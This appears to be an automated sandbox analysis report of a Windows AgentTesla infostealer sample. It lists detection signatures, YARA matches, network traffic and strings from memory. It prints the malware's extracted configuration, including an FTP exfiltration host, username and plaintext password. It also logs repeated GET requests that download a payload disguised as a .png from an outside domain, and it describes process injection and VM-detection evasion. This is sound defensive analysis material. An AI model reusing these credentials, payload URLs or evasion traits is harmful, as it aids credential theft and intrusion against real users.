Windows Analysis Report
SecuriteInfo.com.Variant.Tedy.181709.30142.24418

Overview

General Information

Sample Name: SecuriteInfo.com.Variant.Tedy.181709.30142.24418 (renamed file extension from 24418 to exe)
Analysis ID: 680491
MD5: 3bd0e215df58ce48f17d406fecc01bef
SHA1: ca0c1abb4a39e4deed0f32e322f2046a13aef557
SHA256: c67524e1d2156c802edcef6a7f426db673279191715b0481f6e0746941417a29
Tags: AgentTeslaexe
Infos:

Detection

AgentTesla
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Multi AV Scanner detection for submitted file
Icon mismatch, binary includes an icon from a different legit application in order to fool users
Malicious sample detected (through community Yara rule)
Yara detected AgentTesla
Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Antivirus detection for dropped file
Multi AV Scanner detection for dropped file
Writes to foreign memory regions
Encrypted powershell cmdline option found
Machine Learning detection for sample
.NET source code contains potential unpacker
Injects a PE file into a foreign processes
Yara detected Generic Downloader
.NET source code contains very large array initializations
Machine Learning detection for dropped file
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Yara signature match
Antivirus or Machine Learning detection for unpacked file
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Detected potential crypto function
Yara detected Credential Stealer
JA3 SSL client fingerprint seen in connection with other malware
HTTP GET or POST without a user agent
Contains long sleeps (>= 3 min)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Sample file is different than original file name gathered from version info
PE file contains strange resources
Drops PE files
Creates a process in suspended mode (likely to inject code)

Classification

AV Detection
barindex
Multi AV Scanner detection for submitted file
Source: SecuriteInfo.com.Variant.Tedy.181709.30142.exe Virustotal: Detection: 47% Perma Link
Source: SecuriteInfo.com.Variant.Tedy.181709.30142.exe ReversingLabs: Detection: 34%
Antivirus / Scanner detection for submitted sample
Source: SecuriteInfo.com.Variant.Tedy.181709.30142.exe Avira: detected
Antivirus detection for URL or domain
Source: ftp://ftp.mgcpakistan.com/ddd Avira URL Cloud: Label: phishing
Antivirus detection for dropped file
Source: C:\Users\user\AppData\Roaming\Nuedxyv\Yjgcdbfyd.exe Avira: detection malicious, Label: TR/Dropper.Gen
Multi AV Scanner detection for dropped file
Source: C:\Users\user\AppData\Roaming\Nuedxyv\Yjgcdbfyd.exe ReversingLabs: Detection: 34%
Machine Learning detection for sample
Source: SecuriteInfo.com.Variant.Tedy.181709.30142.exe Joe Sandbox ML: detected
Machine Learning detection for dropped file
Source: C:\Users\user\AppData\Roaming\Nuedxyv\Yjgcdbfyd.exe Joe Sandbox ML: detected
Antivirus or Machine Learning detection for unpacked file
Source: 28.0.InstallUtil.exe.400000.0.unpack Avira: Label: TR/Spy.Gen8
Source: 0.2.SecuriteInfo.com.Variant.Tedy.181709.30142.exe.3509688.1.unpack Malware Configuration Extractor: Agenttesla {"Exfil Mode": "FTP", "FTP Host": "ftp://ftp.mgcpakistan.com/", "Username": "ddd@mgcpakistan.com", "Password": "boygirl123456"}
Uses 32bit PE files
Source: SecuriteInfo.com.Variant.Tedy.181709.30142.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: unknown HTTPS traffic detected: 62.210.244.157:443 -> 192.168.2.4:49748 version: TLS 1.2
Source: unknown HTTPS traffic detected: 62.210.244.157:443 -> 192.168.2.4:49839 version: TLS 1.2
Source: unknown HTTPS traffic detected: 62.210.244.157:443 -> 192.168.2.4:49857 version: TLS 1.2
Source: SecuriteInfo.com.Variant.Tedy.181709.30142.exe Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Networking
barindex
Yara detected Generic Downloader
Source: Yara match File source: 0.2.SecuriteInfo.com.Variant.Tedy.181709.30142.exe.3509688.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 28.0.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.SecuriteInfo.com.Variant.Tedy.181709.30142.exe.35596a8.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.SecuriteInfo.com.Variant.Tedy.181709.30142.exe.5ee0000.4.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000000.00000002.474659710.0000000005EE0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
JA3 SSL client fingerprint seen in connection with other malware
Source: Joe Sandbox View JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
HTTP GET or POST without a user agent
Source: global traffic HTTP traffic detected: GET /loader/uploads/programme_Lpznednj.png HTTP/1.1Host: inspire-ts.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /loader/uploads/programme_Lpznednj.png HTTP/1.1Host: inspire-ts.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /loader/uploads/programme_Lpznednj.png HTTP/1.1Host: inspire-ts.comConnection: Keep-Alive
Source: unknown Network traffic detected: HTTP traffic on port 49839 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49857 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49748 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49839
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49748
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49857
Source: InstallUtil.exe, 0000001C.00000002.503624767.00000000032F1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: ftp://ftp.mgcpakistan.com/ddd
Source: InstallUtil.exe, 0000001C.00000002.503624767.00000000032F1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://127.0.0.1:HTTP/1.1
Source: InstallUtil.exe, 0000001C.00000002.503624767.00000000032F1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://DynDns.comDynDNS
Source: InstallUtil.exe, 0000001C.00000002.503624767.00000000032F1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://QBqGeh.com
Source: Yjgcdbfyd.exe, 0000001D.00000002.501903565.0000000000AE1000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: SecuriteInfo.com.Variant.Tedy.181709.30142.exe, 00000000.00000002.457980099.0000000002471000.00000004.00000800.00020000.00000000.sdmp, Yjgcdbfyd.exe, 0000001B.00000002.507858934.0000000002B31000.00000004.00000800.00020000.00000000.sdmp, Yjgcdbfyd.exe, 0000001D.00000002.504725227.00000000025B1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://google.com
Source: SecuriteInfo.com.Variant.Tedy.181709.30142.exe, Yjgcdbfyd.exe.0.dr String found in binary or memory: http://google.comyhttps://inspire-ts.com/loader/uploads/programme_Lpznednj.png
Source: SecuriteInfo.com.Variant.Tedy.181709.30142.exe, 00000000.00000002.458874462.00000000024E6000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Variant.Tedy.181709.30142.exe, 00000000.00000002.461202691.00000000025D7000.00000004.00000800.00020000.00000000.sdmp, Yjgcdbfyd.exe, 0000001B.00000002.511441647.0000000002C97000.00000004.00000800.00020000.00000000.sdmp, Yjgcdbfyd.exe, 0000001D.00000002.509615439.0000000002715000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://james.newtonking.com/projects/json
Source: SecuriteInfo.com.Variant.Tedy.181709.30142.exe, 00000000.00000002.458185646.0000000002485000.00000004.00000800.00020000.00000000.sdmp, Yjgcdbfyd.exe, 0000001B.00000002.508056313.0000000002B45000.00000004.00000800.00020000.00000000.sdmp, Yjgcdbfyd.exe, 0000001D.00000002.505044223.00000000025C5000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: SecuriteInfo.com.Variant.Tedy.181709.30142.exe, 00000000.00000002.458185646.0000000002485000.00000004.00000800.00020000.00000000.sdmp, Yjgcdbfyd.exe, 0000001B.00000002.508056313.0000000002B45000.00000004.00000800.00020000.00000000.sdmp, Yjgcdbfyd.exe, 0000001D.00000002.505044223.00000000025C5000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://inspire-ts.com
Source: SecuriteInfo.com.Variant.Tedy.181709.30142.exe, 00000000.00000002.458185646.0000000002485000.00000004.00000800.00020000.00000000.sdmp, Yjgcdbfyd.exe, 0000001B.00000002.508056313.0000000002B45000.00000004.00000800.00020000.00000000.sdmp, Yjgcdbfyd.exe, 0000001D.00000002.505044223.00000000025C5000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://inspire-ts.com/loader/uploads/programme_Lpznednj.png
Source: SecuriteInfo.com.Variant.Tedy.181709.30142.exe, 00000000.00000002.458550450.00000000024B2000.00000004.00000800.00020000.00000000.sdmp, Yjgcdbfyd.exe, 0000001B.00000002.508807077.0000000002B8D000.00000004.00000800.00020000.00000000.sdmp, Yjgcdbfyd.exe, 0000001B.00000002.508584296.0000000002B73000.00000004.00000800.00020000.00000000.sdmp, Yjgcdbfyd.exe, 0000001D.00000002.505995035.000000000260D000.00000004.00000800.00020000.00000000.sdmp, Yjgcdbfyd.exe, 0000001D.00000002.505783004.00000000025F3000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://player.vimeo.com
Source: SecuriteInfo.com.Variant.Tedy.181709.30142.exe, 00000000.00000002.474659710.0000000005EE0000.00000004.08000000.00040000.00000000.sdmp, SecuriteInfo.com.Variant.Tedy.181709.30142.exe, 00000000.00000002.466787528.0000000003559000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.newtonsoft.com/jsonschema
Source: SecuriteInfo.com.Variant.Tedy.181709.30142.exe, 00000000.00000002.474659710.0000000005EE0000.00000004.08000000.00040000.00000000.sdmp, SecuriteInfo.com.Variant.Tedy.181709.30142.exe, 00000000.00000002.466787528.0000000003559000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.nuget.org/packages/Newtonsoft.Json.Bson
Source: SecuriteInfo.com.Variant.Tedy.181709.30142.exe, 00000000.00000002.464525599.0000000003471000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Variant.Tedy.181709.30142.exe, 00000000.00000002.466787528.0000000003559000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Variant.Tedy.181709.30142.exe, 00000000.00000002.465470969.00000000034C9000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000001C.00000000.448531071.0000000000402000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip
Source: InstallUtil.exe, 0000001C.00000002.503624767.00000000032F1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%ha
Source: unknown DNS traffic detected: queries for: inspire-ts.com
Source: global traffic HTTP traffic detected: GET /loader/uploads/programme_Lpznednj.png HTTP/1.1Host: inspire-ts.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /loader/uploads/programme_Lpznednj.png HTTP/1.1Host: inspire-ts.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /loader/uploads/programme_Lpznednj.png HTTP/1.1Host: inspire-ts.comConnection: Keep-Alive
Source: unknown HTTPS traffic detected: 62.210.244.157:443 -> 192.168.2.4:49748 version: TLS 1.2
Source: unknown HTTPS traffic detected: 62.210.244.157:443 -> 192.168.2.4:49839 version: TLS 1.2
Source: unknown HTTPS traffic detected: 62.210.244.157:443 -> 192.168.2.4:49857 version: TLS 1.2

System Summary
barindex
Malicious sample detected (through community Yara rule)
Source: 0.2.SecuriteInfo.com.Variant.Tedy.181709.30142.exe.3509688.1.raw.unpack, type: UNPACKEDPE Matched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
Source: 0.2.SecuriteInfo.com.Variant.Tedy.181709.30142.exe.3509688.1.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_AgentTesla_d3ac2b2f Author: unknown
Source: 0.2.SecuriteInfo.com.Variant.Tedy.181709.30142.exe.3509688.1.unpack, type: UNPACKEDPE Matched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
Source: 0.2.SecuriteInfo.com.Variant.Tedy.181709.30142.exe.3509688.1.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_AgentTesla_d3ac2b2f Author: unknown
Source: 28.0.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
Source: 28.0.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_AgentTesla_d3ac2b2f Author: unknown
Source: 0.2.SecuriteInfo.com.Variant.Tedy.181709.30142.exe.34e1668.2.raw.unpack, type: UNPACKEDPE Matched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
Source: 0.2.SecuriteInfo.com.Variant.Tedy.181709.30142.exe.34e1668.2.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_AgentTesla_d3ac2b2f Author: unknown
Source: 0.2.SecuriteInfo.com.Variant.Tedy.181709.30142.exe.35596a8.3.unpack, type: UNPACKEDPE Matched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
Source: 0.2.SecuriteInfo.com.Variant.Tedy.181709.30142.exe.35596a8.3.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_AgentTesla_d3ac2b2f Author: unknown
Source: 0.2.SecuriteInfo.com.Variant.Tedy.181709.30142.exe.35596a8.3.raw.unpack, type: UNPACKEDPE Matched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
Source: 0.2.SecuriteInfo.com.Variant.Tedy.181709.30142.exe.35596a8.3.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_AgentTesla_d3ac2b2f Author: unknown
Source: 00000000.00000002.464525599.0000000003471000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_AgentTesla_d3ac2b2f Author: unknown
Source: 0000001C.00000000.448531071.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_AgentTesla_d3ac2b2f Author: unknown
Source: 0000001C.00000002.503624767.00000000032F1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
Source: 00000000.00000002.465470969.00000000034C9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_AgentTesla_d3ac2b2f Author: unknown
Source: 00000000.00000002.466787528.0000000003559000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_AgentTesla_d3ac2b2f Author: unknown
Source: Process Memory Space: SecuriteInfo.com.Variant.Tedy.181709.30142.exe PID: 5596, type: MEMORYSTR Matched rule: Windows_Trojan_AgentTesla_d3ac2b2f Author: unknown
Source: Process Memory Space: InstallUtil.exe PID: 4636, type: MEMORYSTR Matched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
Source: Process Memory Space: InstallUtil.exe PID: 4636, type: MEMORYSTR Matched rule: Windows_Trojan_AgentTesla_d3ac2b2f Author: unknown
.NET source code contains very large array initializations
Source: 28.0.InstallUtil.exe.400000.0.unpack, u003cPrivateImplementationDetailsu003eu007b8ACD78FFu002d0687u002d4F83u002dA424u002dB202B77F6A3Du007d/CD9B3F8Bu002d4159u002d4C89u002dB0A8u002d0B1DC12FF8EC.cs Large array initialization: .cctor: array initializer size 11947
Uses 32bit PE files
Source: SecuriteInfo.com.Variant.Tedy.181709.30142.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Yara signature match
Source: 0.2.SecuriteInfo.com.Variant.Tedy.181709.30142.exe.3509688.1.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
Source: 0.2.SecuriteInfo.com.Variant.Tedy.181709.30142.exe.3509688.1.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_AgentTesla_d3ac2b2f reference_sample = 65463161760af7ab85f5c475a0f7b1581234a1e714a2c5a555783bdd203f85f4, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AgentTesla, fingerprint = cbbb56fe6cd7277ae9595a10e05e2ce535a4e6bf205810be0bbce3a883b6f8bc, id = d3ac2b2f-14fc-4851-8a57-41032e386aeb, last_modified = 2022-06-20
Source: 0.2.SecuriteInfo.com.Variant.Tedy.181709.30142.exe.3509688.1.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
Source: 0.2.SecuriteInfo.com.Variant.Tedy.181709.30142.exe.3509688.1.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_AgentTesla_d3ac2b2f reference_sample = 65463161760af7ab85f5c475a0f7b1581234a1e714a2c5a555783bdd203f85f4, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AgentTesla, fingerprint = cbbb56fe6cd7277ae9595a10e05e2ce535a4e6bf205810be0bbce3a883b6f8bc, id = d3ac2b2f-14fc-4851-8a57-41032e386aeb, last_modified = 2022-06-20
Source: 28.0.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
Source: 28.0.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_AgentTesla_d3ac2b2f reference_sample = 65463161760af7ab85f5c475a0f7b1581234a1e714a2c5a555783bdd203f85f4, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AgentTesla, fingerprint = cbbb56fe6cd7277ae9595a10e05e2ce535a4e6bf205810be0bbce3a883b6f8bc, id = d3ac2b2f-14fc-4851-8a57-41032e386aeb, last_modified = 2022-06-20
Source: 0.2.SecuriteInfo.com.Variant.Tedy.181709.30142.exe.34e1668.2.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
Source: 0.2.SecuriteInfo.com.Variant.Tedy.181709.30142.exe.34e1668.2.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_AgentTesla_d3ac2b2f reference_sample = 65463161760af7ab85f5c475a0f7b1581234a1e714a2c5a555783bdd203f85f4, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AgentTesla, fingerprint = cbbb56fe6cd7277ae9595a10e05e2ce535a4e6bf205810be0bbce3a883b6f8bc, id = d3ac2b2f-14fc-4851-8a57-41032e386aeb, last_modified = 2022-06-20
Source: 0.2.SecuriteInfo.com.Variant.Tedy.181709.30142.exe.35596a8.3.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
Source: 0.2.SecuriteInfo.com.Variant.Tedy.181709.30142.exe.35596a8.3.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_AgentTesla_d3ac2b2f reference_sample = 65463161760af7ab85f5c475a0f7b1581234a1e714a2c5a555783bdd203f85f4, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AgentTesla, fingerprint = cbbb56fe6cd7277ae9595a10e05e2ce535a4e6bf205810be0bbce3a883b6f8bc, id = d3ac2b2f-14fc-4851-8a57-41032e386aeb, last_modified = 2022-06-20
Source: 0.2.SecuriteInfo.com.Variant.Tedy.181709.30142.exe.35596a8.3.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
Source: 0.2.SecuriteInfo.com.Variant.Tedy.181709.30142.exe.35596a8.3.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_AgentTesla_d3ac2b2f reference_sample = 65463161760af7ab85f5c475a0f7b1581234a1e714a2c5a555783bdd203f85f4, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AgentTesla, fingerprint = cbbb56fe6cd7277ae9595a10e05e2ce535a4e6bf205810be0bbce3a883b6f8bc, id = d3ac2b2f-14fc-4851-8a57-41032e386aeb, last_modified = 2022-06-20
Source: 00000000.00000002.464525599.0000000003471000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_AgentTesla_d3ac2b2f reference_sample = 65463161760af7ab85f5c475a0f7b1581234a1e714a2c5a555783bdd203f85f4, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AgentTesla, fingerprint = cbbb56fe6cd7277ae9595a10e05e2ce535a4e6bf205810be0bbce3a883b6f8bc, id = d3ac2b2f-14fc-4851-8a57-41032e386aeb, last_modified = 2022-06-20
Source: 0000001C.00000000.448531071.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_AgentTesla_d3ac2b2f reference_sample = 65463161760af7ab85f5c475a0f7b1581234a1e714a2c5a555783bdd203f85f4, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AgentTesla, fingerprint = cbbb56fe6cd7277ae9595a10e05e2ce535a4e6bf205810be0bbce3a883b6f8bc, id = d3ac2b2f-14fc-4851-8a57-41032e386aeb, last_modified = 2022-06-20
Source: 0000001C.00000002.503624767.00000000032F1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
Source: 00000000.00000002.465470969.00000000034C9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_AgentTesla_d3ac2b2f reference_sample = 65463161760af7ab85f5c475a0f7b1581234a1e714a2c5a555783bdd203f85f4, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AgentTesla, fingerprint = cbbb56fe6cd7277ae9595a10e05e2ce535a4e6bf205810be0bbce3a883b6f8bc, id = d3ac2b2f-14fc-4851-8a57-41032e386aeb, last_modified = 2022-06-20
Source: 00000000.00000002.466787528.0000000003559000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_AgentTesla_d3ac2b2f reference_sample = 65463161760af7ab85f5c475a0f7b1581234a1e714a2c5a555783bdd203f85f4, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AgentTesla, fingerprint = cbbb56fe6cd7277ae9595a10e05e2ce535a4e6bf205810be0bbce3a883b6f8bc, id = d3ac2b2f-14fc-4851-8a57-41032e386aeb, last_modified = 2022-06-20
Source: Process Memory Space: SecuriteInfo.com.Variant.Tedy.181709.30142.exe PID: 5596, type: MEMORYSTR Matched rule: Windows_Trojan_AgentTesla_d3ac2b2f reference_sample = 65463161760af7ab85f5c475a0f7b1581234a1e714a2c5a555783bdd203f85f4, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AgentTesla, fingerprint = cbbb56fe6cd7277ae9595a10e05e2ce535a4e6bf205810be0bbce3a883b6f8bc, id = d3ac2b2f-14fc-4851-8a57-41032e386aeb, last_modified = 2022-06-20
Source: Process Memory Space: InstallUtil.exe PID: 4636, type: MEMORYSTR Matched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
Source: Process Memory Space: InstallUtil.exe PID: 4636, type: MEMORYSTR Matched rule: Windows_Trojan_AgentTesla_d3ac2b2f reference_sample = 65463161760af7ab85f5c475a0f7b1581234a1e714a2c5a555783bdd203f85f4, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AgentTesla, fingerprint = cbbb56fe6cd7277ae9595a10e05e2ce535a4e6bf205810be0bbce3a883b6f8bc, id = d3ac2b2f-14fc-4851-8a57-41032e386aeb, last_modified = 2022-06-20
Detected potential crypto function
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Tedy.181709.30142.exe Code function: 0_2_0093ED70 0_2_0093ED70
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Tedy.181709.30142.exe Code function: 0_2_00935724 0_2_00935724
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Tedy.181709.30142.exe Code function: 0_2_0093B2E4 0_2_0093B2E4
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Tedy.181709.30142.exe Code function: 0_2_0093DB20 0_2_0093DB20
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 28_2_017C47A0 28_2_017C47A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 28_2_017C3CCC 28_2_017C3CCC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 28_2_017C46F0 28_2_017C46F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 28_2_017C46B0 28_2_017C46B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 28_2_017C5473 28_2_017C5473
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 28_2_06726508 28_2_06726508
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 28_2_06726850 28_2_06726850
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 28_2_067290D8 28_2_067290D8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 28_2_06727120 28_2_06727120
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 28_2_06722260 28_2_06722260
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 28_2_0672213F 28_2_0672213F
Sample file is different than original file name gathered from version info
Source: SecuriteInfo.com.Variant.Tedy.181709.30142.exe, 00000000.00000002.474659710.0000000005EE0000.00000004.08000000.00040000.00000000.sdmp Binary or memory string: OriginalFilenameAffbhpjikowqa.dll" vs SecuriteInfo.com.Variant.Tedy.181709.30142.exe
Source: SecuriteInfo.com.Variant.Tedy.181709.30142.exe, 00000000.00000002.451766255.00000000004F8000.00000004.00000010.00020000.00000000.sdmp Binary or memory string: OriginalFilenameUNKNOWN_FILET vs SecuriteInfo.com.Variant.Tedy.181709.30142.exe
Source: SecuriteInfo.com.Variant.Tedy.181709.30142.exe, 00000000.00000000.226714845.00000000000DE000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: OriginalFilenameprogramme.exe0 vs SecuriteInfo.com.Variant.Tedy.181709.30142.exe
Source: SecuriteInfo.com.Variant.Tedy.181709.30142.exe, 00000000.00000002.458677261.00000000024CC000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilename vs SecuriteInfo.com.Variant.Tedy.181709.30142.exe
Source: SecuriteInfo.com.Variant.Tedy.181709.30142.exe, 00000000.00000002.466787528.0000000003559000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenameHuZZAAMCeGwdhMqPIdYhegykfsuQesZY.exe4 vs SecuriteInfo.com.Variant.Tedy.181709.30142.exe
Source: SecuriteInfo.com.Variant.Tedy.181709.30142.exe, 00000000.00000002.466787528.0000000003559000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenameAffbhpjikowqa.dll" vs SecuriteInfo.com.Variant.Tedy.181709.30142.exe
Source: SecuriteInfo.com.Variant.Tedy.181709.30142.exe, 00000000.00000002.465470969.00000000034C9000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenameHuZZAAMCeGwdhMqPIdYhegykfsuQesZY.exe4 vs SecuriteInfo.com.Variant.Tedy.181709.30142.exe
Source: SecuriteInfo.com.Variant.Tedy.181709.30142.exe, 00000000.00000002.460286860.000000000256B000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenameHuZZAAMCeGwdhMqPIdYhegykfsuQesZY.exe4 vs SecuriteInfo.com.Variant.Tedy.181709.30142.exe
Source: SecuriteInfo.com.Variant.Tedy.181709.30142.exe Binary or memory string: OriginalFilenameprogramme.exe0 vs SecuriteInfo.com.Variant.Tedy.181709.30142.exe
PE file contains strange resources
Source: SecuriteInfo.com.Variant.Tedy.181709.30142.exe Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: Yjgcdbfyd.exe.0.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: SecuriteInfo.com.Variant.Tedy.181709.30142.exe Virustotal: Detection: 47%
Source: SecuriteInfo.com.Variant.Tedy.181709.30142.exe ReversingLabs: Detection: 34%
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Tedy.181709.30142.exe File read: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Tedy.181709.30142.exe Jump to behavior
Source: SecuriteInfo.com.Variant.Tedy.181709.30142.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
